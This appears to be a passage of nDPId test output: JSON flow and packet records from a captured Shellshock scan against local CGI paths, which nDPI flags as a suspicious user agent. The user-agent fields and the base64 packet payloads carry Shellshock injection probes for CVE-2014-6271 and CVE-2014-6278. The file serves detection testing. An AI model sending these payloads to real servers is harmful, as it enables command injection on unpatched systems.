{"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277381,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":1,"flow_last_seen":1576420277381,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277381,"pkt":"AAAAAAAAAAAAAAAACABFAAEKrtxAAEAGjQ9\/AAABfwAAAcUKH5Ddg5Yc5mMQaoAYAED+\/gAAAQEICp1m\/a2dZv2sR0VUIC9hZG1pbi5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277381,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7440000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277383,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_packet_id":1,"flow_last_seen":1576420277383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":288,"pkt_l4_len":254,"thread_ts_msec":1576420277383,"pkt":"AAAAAAAAAAAAAAAACABFAAES8w1AAEAGSNZ\/AAABfwAAAcUMH5A5v8vLlyOw2IAYAED\/BgAAAQEICp1m\/a+dZv2vR0VUIC9hZG1pbmlzdHJhdG9yLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} -01173{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":441,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277383,"flow_last_seen":1576420277383,"flow_idle_time":7440000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277383,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50444,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/administrator.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277386,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_packet_id":1,"flow_last_seen":1576420277386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"thread_ts_msec":1576420277386,"pkt":"AAAAAAAAAAAAAAAACABFAAEO1qdAAEAGZUB\/AAABfwAAAcUOH5C5aO5oSApQ3oAYAED\/AgAAAQEICp1m\/bKdZv2yR0VUIC9hdXRoTG9naW4uY2dpIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01169{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277386,"flow_last_seen":1576420277386,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277386,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50446,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/authLogin.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277387,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_packet_id":1,"flow_last_seen":1576420277387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277387,"pkt":"AAAAAAAAAAAAAAAACABFAAEL0qJAAEAGaUh\/AAABfwAAAcUQH5BC7upk6xmcJIAYAED+\/wAAAQEICp1m\/bOdZv2zR0VUIC9iYi1oaXN0LnNoIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277387,"flow_last_seen":1576420277387,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277387,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50448,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-hist.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277389,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_packet_id":1,"flow_last_seen":1576420277389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277389,"pkt":"AAAAAAAAAAAAAAAACABFAAELgRJAAEAGuth\/AAABfwAAAcUSH5B08bnUX64J5YAYAED+\/wAAAQEICp1m\/bWdZv21R0VUIC9iYW5uZXIuY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KDQo="} -01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277389,"flow_last_seen":1576420277389,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277389,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50450,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/banner.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277391,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":1,"flow_last_seen":1576420277391,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277391,"pkt":"AAAAAAAAAAAAAAAACABFAAEJF\/tAAEAGI\/J\/AAABfwAAAcUUH5B+1S87jYTLUoAYAED+\/QAAAQEICp1m\/bedZv23R0VUIC9ib29rLmNnaSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"} -01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":445,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277391,"flow_last_seen":1576420277391,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277391,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50452,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/book.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277392,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":1,"flow_last_seen":1576420277392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277392,"pkt":"AAAAAAAAAAAAAAAACABFAAEM+RhAAEAGQtF\/AAABfwAAAcUWH5DPIMHTViTvW4AYAED\/AAAAAQEICp1m\/bidZv24R0VUIC9jZ2lpbmZvLmNnaSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} -01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":446,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277392,"flow_last_seen":1576420277392,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277392,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50454,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgiinfo.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277394,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":1,"flow_last_seen":1576420277394,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277394,"pkt":"AAAAAAAAAAAAAAAACABFAAELY9VAAEAG2BV\/AAABfwAAAcUYH5AazFsY4\/xNyIAYAED+\/wAAAQEICp1m\/bqdZv26R0VUIC9jZ2l0ZXN0LnB5IEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} -01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277394,"flow_last_seen":1576420277394,"flow_idle_time":7440000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277394,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50456,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgitest.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277395,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":1,"flow_last_seen":1576420277395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277395,"pkt":"AAAAAAAAAAAAAAAACABFAAEMSAFAAEAG8+h\/AAABfwAAAcUaH5B7UH87Bk0XQYAYAED\/AAAAAQEICp1m\/budZv27R0VUIC9jZ2lfd3JhcHBlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} -01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":448,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277395,"flow_last_seen":1576420277395,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277395,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50458,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi_wrapper","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277398,"flow_last_seen":1576420277398,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277398,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50460,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":1,"flow_last_seen":1576420277398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277398,"pkt":"AAAAAAAAAAAAAAAACABFAAEMKndAAEAGEXN\/AAABfwAAAcUcH5BMbxKxdmdFb4AYAED\/AAAAAQEICp1m\/b6dZv2+R0VUIC9jb250YWN0LmNnaSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 